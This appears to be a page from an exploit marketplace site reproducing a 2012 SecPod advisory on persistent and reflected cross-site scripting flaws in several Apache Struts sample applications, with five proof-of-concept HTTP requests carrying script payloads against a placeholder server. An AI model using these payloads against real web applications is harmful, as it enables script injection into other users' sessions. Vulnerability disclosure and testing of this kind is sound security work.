0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
############################################################################## # # Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities # Author : Antu Sanadi SecPod Technologies (www.secpod.com) # Vendor : http://struts.apache.org/ # Advisory : http://secpod.org/blog/?p=450 # http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt # Software : Apache struts 1.3.10, 2.0.14 and 2.2.3 # Date : 01/02/2012 # ############################################################################## SecPod ID: 1021 21/07/2011 Issue Discovered 03/08/2011 Vendor Notified No Response 01/02/2012 Advisory Released Class: Cross-Site Scripting (Persistence) Severity: High Overview: --------- Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities. Technical Description: ---------------------- Multiple persistence Cross-Site Scripting vulnerabilities are present in Apache Struts, as it fails to sanitise user-supplied input. i) Input passed via the 'name' and 'lastName' parameter in '/struts2-showcase/person/editPerson.action' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. ii) Input passed via the 'clientName' parameter in '/struts2-rest-showcase/orders' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. iii) Input passed via the 'name' parameter in '/struts-examples/upload/upload-submit.do?queryParam=Successful' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. iV) Input passed via the 'message' parameter in '/struts-cookbook/processSimple.do' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. V) Input passed via the 'message' parameter in '/struts-cookbook/processSimple.do' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. These vulnerabilities have been tested on Apache Struts2 v2.2.3, Apache Struts2 v2.0.14 and Apache Struts v1.3.10. Other versions may also be affected. Impact: -------- Successful exploitation could allow an attacker to execute arbitrary HTML code in a user's browser session in the context of a vulnerable application. Affected Software: ------------------ Apache struts 2.2.3 and prior. Tested on, i) Apache struts 2.2.3 - Stored XSS - struts2-showcase-2.2.3 - struts2-rest-showcase-2.2.3 ii) Apache struts 2.0.14 - Stored XSS - struts2-showcase-2.0.14 iii) Apache struts 1.3.10 - Reflected XSS - struts-cookbook-1.3.10 - struts-examples-1.3.10 References: ----------- http://struts.apache.org http://secpod.org/blog/?p=450 Proof of Concept: ----------------- POC 1: ----- Stored XSS POST struts2-showcase/person/editPerson.action HTTP/1.1 Host: SERVER_IP:8080 User-Agent: struts2-showcase XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 192 Post Data: ---------- persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript %3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2 Fscript%3E&method%3Asave=Save+all+persons POC 2: ----- Stored XSS POST /struts2-rest-showcase/orders HTTP/1.1 Host: SERVER_IP:8080 User-Agent: struts2-rest-showcase XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 78 Post Data: ---------- clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount= POC 3: ----- Reflected XSS POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1 Host: SERVER_IP:8080 User-Agent: Struts-examples XSS-TEST Content-Type: multipart/form-data; boundary=---------------------------41701 161044225432961947041 Content-Length: 481 Post Data: ---------- -----------------------------41701161044225432961947041\r\n Content-Disposition: form-data; name="theText"\r\n \r\n <script>alert("SecPod-XSS-TEST")</script>\r\n -----------------------------41701161044225432961947041\r\n Content-Disposition: form-data; name="theFile"; filename=""\r\n Content-Type: application/octet-stream\r\n \r\n \r\n -----------------------------41701161044225432961947041\r\n Content-Disposition: form-data; name="filePath"\r\n \r\n \r\n -----------------------------41701161044225432961947041--\r\n POC 4: ----- Reflected XSS POST /struts-cookbook/processSimple.do HTTP/1.1 Host: SERVER_IP:8080 User-Agent:Struts-cookbook XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 118 Post Data: ---------- name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert %28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E& POC 5: ----- Reflected XSS POST /struts-cookbook/processDyna.do HTTP/1.1 Host: SERVER_IP:8080 User-Agent:Struts-cookbook XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 95 Post Data: ---------- name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST %22%29%3C%2Fscript%3E& Solution: --------- Fix not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = NONE CONFIDENTIALITY_IMPACT = PARTIAL INTEGRITY_IMPACT = PARTIAL AVAILABILITY_IMPACT = NONE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N) Credits: -------- Antu Sanadi of SecPod Technologies has been credited with the discovery of this vulnerability. # 0day.today [2024-12-25] #